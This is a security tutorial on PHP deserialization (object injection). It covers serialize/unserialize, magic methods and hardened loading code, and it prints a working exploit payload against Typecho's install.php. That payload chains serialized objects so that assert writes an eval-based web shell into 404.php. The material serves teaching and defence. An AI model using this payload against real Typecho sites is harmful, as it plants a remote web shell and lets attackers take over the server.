* Serialization
* Converts an object into a string.
* Deserialization
* Converts a string in a specific format back into an object.
What is a deserialization vulnerability
*
* The PHP deserialization vulnerability is also known as PHP object injection. It is a very common class of vulnerability: it is hard to exploit, but a successful exploit has very dangerous consequences. The root cause is that the program does not validate the user-supplied string before deserializing it, so the deserialization process can be controlled by an attacker, which leads to code execution, getshell and a series of other uncontrollable consequences. Deserialization vulnerabilities are not specific to PHP; they also exist in Java, Python and other languages, and the principle is basically the same.
* Ordinary programs commonly override the constructor and destructor (and other magic methods); a deserialization exploit abuses these overridden methods.
Deserialization functions
* PHP has two relevant functions:
* 1. serialize()
* 2. unserialize()
* 1. serialize()
* After an object has been created in PHP, serialize() turns it into a string, preserving the object's values so that they can be transferred and used later.
* 2. unserialize()
* Correspondingly, unserialize() creates a PHP value from a stored representation; as far as the current environment is concerned, the object can be recovered from the serialized result.
* Example:

    $arr = array();
    $arr['name'] = '张三';
    $arr['age'] = '22';
    $arr['sex'] = '男';
    $arr['phone'] = '123456789';
    $arr['address'] = '上海市浦东新区';
    var_dump($arr);

* Output (the Chinese values are the ones from the original example; var_dump() reports string lengths in bytes, which is why the two-character name 张三 is string(6)):

    array(5) {
      ["name"]=> string(6) "张三"
      ["age"]=> string(2) "22"
      ["sex"]=> string(3) "男"
      ["phone"]=> string(9) "123456789"
      ["address"]=> string(21) "上海市浦东新区"
    }

* Serialize:

    $info = serialize($arr);
    var_dump($info);

* Output:

    string(140) "a:5:{s:4:"name";s:6:"张三";s:3:"age";s:2:"22";s:3:"sex";s:3:"男";s:5:"phone";s:9:"123456789";s:7:"address";s:21:"上海市浦东新区";}"

* a:5 marks a serialized array containing 5 key-value pairs; s:4 marks a string of 4 characters (more precisely 4 bytes: PHP counts the length in bytes, so the multi-byte Chinese strings get the larger counts shown).

    $zhangsan = unserialize($info);
    var_dump($zhangsan);

* Output:

    array(5) {
      ["name"]=> string(6) "张三"
      ["age"]=> string(2) "22"
      ["sex"]=> string(3) "男"
      ["phone"]=> string(9) "123456789"
      ["address"]=> string(21) "上海市浦东新区"
    }
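The token layout described above (a:<count> for arrays, s:<bytes> for strings, O:<len>:"<class>" for objects, with every length counted in bytes) can be walked without ever calling unserialize(). The following scanner is an added example, not code from the original page: it lists the class names a blob would instantiate, so an application can log or reject unexpected classes before deserializing. The function names and the constructed sample blob are assumptions made for this illustration.

```php
<?php
// Added example (not from the original page): list the classes a serialized
// PHP blob references, walking the format by its byte-length prefixes.

// Expects "<len>:<open><len bytes><close>" at $pos; returns the position just
// after $close. Throws on truncated or inconsistent input.
function skipBody(string $blob, int $pos, string $open, string $close): int
{
    $colon = strpos($blob, ':', $pos);
    if ($colon === false) {
        throw new RuntimeException('truncated token');
    }
    $len   = (int) substr($blob, $pos, $colon - $pos);
    $start = $colon + 2;                         // past ':' and the opening delimiter
    if (($blob[$colon + 1] ?? '') !== $open || ($blob[$start + $len] ?? '') !== $close) {
        throw new RuntimeException('malformed body at offset ' . $pos);
    }
    return $start + $len + 1;
}

// Reads "<len>:"<name>"" at $pos; returns [name, position after the closing quote].
function readQuotedName(string $blob, int $pos): array
{
    $end   = skipBody($blob, $pos, '"', '"');
    $colon = strpos($blob, ':', $pos);
    $len   = (int) substr($blob, $pos, $colon - $pos);
    return [substr($blob, $colon + 2, $len), $end];
}

// Returns the distinct class names referenced by O: (object) and C: (custom
// Serializable) tokens. String bodies are skipped by length, so a string that
// merely contains text like O:4:"Fake" is not miscounted.
function serializedClasses(string $blob): array
{
    $classes = [];
    $n = strlen($blob);
    $i = 0;
    while ($i < $n) {
        $c = $blob[$i];
        if ($c === 's' && substr($blob, $i, 2) === 's:') {
            $i = skipBody($blob, $i + 2, '"', '"');           // s:<len>:"<bytes>"
        } elseif ($c === 'S' && substr($blob, $i, 2) === 'S:') {
            throw new RuntimeException('escaped string token (S:) not supported');
        } elseif (($c === 'O' || $c === 'C') && substr($blob, $i, 2) === "$c:") {
            [$name, $i] = readQuotedName($blob, $i + 2);      // O:<len>:"<class>"
            $classes[] = $name;
            if ($c === 'C') {
                $i = skipBody($blob, $i + 1, '{', '}');       // C: carries <len>:{<raw>}
            }
        } else {
            $i++;   // i:, b:, d:, N:, r:, R:, braces and separators are single chars
        }
    }
    return array_values(array_unique($classes));
}

// Constructed sample: a harmless array, a decoy string that looks like an object
// token, and one real object token. Only "Settings" should be reported.
$sample = 'a:2:{s:4:"data";s:15:"O:4:"Fake":0:{}";s:3:"obj";O:8:"Settings":1:{s:5:"debug";b:1;}}';
print_r(serializedClasses($sample));

// Typical gate in front of unserialize(): refuse anything that instantiates a
// class not on an explicit allow-list.
$allowed = ['Settings'];
$unexpected = array_diff(serializedClasses($sample), $allowed);
if ($unexpected !== []) {
    error_log('refusing blob referencing: ' . implode(', ', $unexpected));
}
```

The scanner is a detection aid, not a substitute for the allowed_classes option of unserialize(); it is useful where the blob must be inspected or logged before the real deserialization runs, and it deliberately throws on anything it cannot account for rather than guessing.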
Magic methods
* "Magic methods"
* are a class of special methods in PHP that the interpreter invokes automatically at particular points in an object's life cycle.
* __construct():
* Called automatically when an object is created with new. It is not called by unserialize(). (Constructor)
* __destruct():
* Called automatically when the object is destroyed. (Destructor)
* __wakeup():
* Called automatically by unserialize().
* __sleep():
* Triggered by serialize().
* __call():
* Triggered when an inaccessible method is invoked in an object context.
* __callStatic():
* Triggered when an inaccessible method is invoked in a static context.
* __get():
* Used to read data from inaccessible properties.
* __set():
* Used to write data to inaccessible properties.
* __isset():
* Triggered when isset() or empty() is called on an inaccessible property.
* __unset():
* Triggered when unset() is used on an inaccessible property.
* __toString():
* Triggered when an object is used as a string.
* __invoke():
* Triggered when a script tries to call an object as a function.
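The serialization-related magic methods listed above, exercised in one script. This is an added example, not code from the original page: the Session class, its properties and the sample values are made up for illustration. It shows that __construct() runs only for new, __sleep() runs inside serialize(), __wakeup() runs inside unserialize() in place of the constructor, and __destruct() runs for every object instance, including the one unserialize() rebuilt.

```php
<?php
// Added example (not from the original page): which magic methods PHP invokes
// around serialize() and unserialize(). Class name, properties and values are
// made up for this illustration.
class Session
{
    public $user;
    public $token;
    private $dbHandle;   // transient; re-created by __wakeup() instead of being stored

    public function __construct($user, $token)
    {
        echo "__construct() called\n";
        $this->user = $user;
        $this->token = $token;
        $this->dbHandle = 'fake-handle';
    }

    // Invoked by serialize(): returns the names of the properties to store.
    public function __sleep()
    {
        echo "__sleep() called\n";
        return ['user', 'token'];
    }

    // Invoked by unserialize() after the object has been rebuilt from the string.
    // __construct() is not called on this path, so anything the constructor
    // normally validates or initialises has to be redone here.
    public function __wakeup()
    {
        echo "__wakeup() called\n";
        $this->dbHandle = 'fake-handle';
    }

    // Invoked when the object is used where a string is expected.
    public function __toString()
    {
        echo "__toString() called\n";
        return "Session(user={$this->user})";
    }

    // Invoked when the object is destroyed (unset(), scope exit, script end).
    public function __destruct()
    {
        echo "__destruct() called for {$this->user}\n";
    }
}

echo "== new ==\n";
$s = new Session('alice', 'tok-123');

echo "== serialize() ==\n";
$blob = serialize($s);
echo $blob, "\n";

echo "== unserialize() ==\n";
$copy = unserialize($blob);

echo "== string context ==\n";
echo 'as string: ' . $copy . "\n";

echo "== unset() ==\n";
unset($s);

echo "== script end ==\n";
// $copy is destroyed after this line, so __destruct() runs once more.
```

Run it with php from the command line and follow the trace: serialize() emits O:7:"Session":2:{...} containing only the two properties __sleep() returned, __construct() appears once and __wakeup() once, and __destruct() appears twice, once per object instance. The second instance was built from the string alone, which is exactly why a destructor with side effects becomes dangerous when the string comes from a user.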
Typecho deserialization vulnerability
* Typecho:
* A simple, lightweight blog program based on PHP that stores its data in any of several databases (MySQL, PostgreSQL, SQLite). It is released under the GPL version 2 license, is open source, and currently uses SVN for version management.
* The Typecho vulnerability:
* 1. The vulnerable file is install.php in the site root.
* 2. At the vulnerable location, the unserialize() function is used to deserialize the received __typecho_config parameter.
* 3. Following the source code from there leads to a constructor that the exploit chain uses.
* Typecho exploitation payload:
*
a:2:{s:7:"adapter";O:12:"Typecho_Feed":4:{s:19:"Typecho_Feed_type";s:8:"ATOM
1.0";s:22:"Typecho_Feed_charset";s:5:"UTF-8";s:19:"Typecho_Feed_lang";s:2:"zh";s:20:"Typecho_Feed_items";a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":2:{s:24:"Typecho_Request_params";a:1:{s:10:"screenName";s:57:"file_put_contents(’404.php',
'<?php
@eval($_POST[i]);?>')";}s:24:"Typecho_Request_filter";a:1:{i:0;s:6:"assert";}}}}}s:6:"prefix";s:7:"typecho";}
Repair and defense
* As with most vulnerabilities, the deserialization problem is caused by user-controlled parameters, so a good preventive measure is never to pass user input or other controllable parameters directly into a deserialization operation.
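The advice above in code, as an added example that is not part of the original page: the unsafe pattern beside three hardened alternatives, namely the allowed_classes option of unserialize() (available since PHP 7.0), an HMAC check with hash_hmac() and hash_equals() before anything is deserialized, and json_decode() for data that genuinely comes from the user. The Logger class, the function names, the secret and the constructed hostile blob are all made up for this example.

```php
<?php
// Added example (not from the original page): unsafe unserialize() beside
// hardened alternatives. Logger, the function names, the secret and the
// sample blob are constructed for this illustration.

class Logger
{
    public $file = '/tmp/app.log';
    public $line = '';
    // A destructor with side effects is what makes attacker-controlled
    // unserialize() dangerous: it runs with whatever property values the blob set.
    public function __destruct()
    {
        echo "[Logger] would write '{$this->line}' to {$this->file}\n";
    }
}

// 1) Unsafe: user data goes straight into unserialize(), so any loaded class with
//    a __destruct()/__wakeup() can be instantiated with attacker-chosen properties.
function loadUnsafe(string $userData)
{
    return unserialize($userData);
}

// 2) Hardened: allowed_classes => false. Objects in the blob become
//    __PHP_Incomplete_Class, so no application magic method runs; scalars and
//    arrays still deserialize normally.
function loadScalarsOnly(string $userData)
{
    return unserialize($userData, ['allowed_classes' => false]);
}

// 3) Hardened: authenticate the blob with an HMAC before touching it, so only
//    data the server itself produced is ever deserialized.
function seal(string $payload, string $secret): string
{
    return hash_hmac('sha256', $payload, $secret) . ':' . $payload;
}

function loadSealed(string $sealed, string $secret)
{
    $parts = explode(':', $sealed, 2);   // the hex MAC never contains ':'
    if (count($parts) !== 2) {
        return null;
    }
    [$mac, $payload] = $parts;
    $expected = hash_hmac('sha256', $payload, $secret);
    if (!hash_equals($expected, $mac)) {   // constant-time comparison
        return null;                        // forged or tampered: refuse to unserialize
    }
    // Even for authenticated data, keep an explicit allow-list of classes.
    return unserialize($payload, ['allowed_classes' => ['Logger']]);
}

// 4) Simplest: a data-only format for anything user-supplied.
function loadJson(string $userData)
{
    return json_decode($userData, true);   // arrays only, never objects with methods
}

// Constructed hostile input: a Logger with attacker-chosen properties.
$hostile = 'O:6:"Logger":2:{s:4:"file";s:10:"/tmp/x.txt";s:4:"line";s:4:"junk";}';

echo "unsafe:\n";
$obj = loadUnsafe($hostile);   // a live Logger; its __destruct() runs at unset()
unset($obj);

echo "allowed_classes => false:\n";
$inc = loadScalarsOnly($hostile);
var_dump(get_class($inc));     // __PHP_Incomplete_Class: Logger code never runs
unset($inc);

echo "sealed:\n";
$secret = 'demo-secret-change-me';   // would come from configuration in practice
var_dump(loadSealed(seal(serialize(['id' => 42]), $secret), $secret));
var_dump(loadSealed('deadbeef:' . $hostile, $secret));

echo "json:\n";
var_dump(loadJson('{"id":42}'));
```

Of the four, only loadUnsafe() lets the attacker-controlled destructor execute; loadScalarsOnly() and loadSealed() both refuse it, the first by stripping class identity and the second by rejecting the unauthenticated blob outright, and loadJson() avoids object instantiation altogether. Where serialized objects must cross a trust boundary, combining the MAC with an allow-list, as loadSealed() does, is the defensible default.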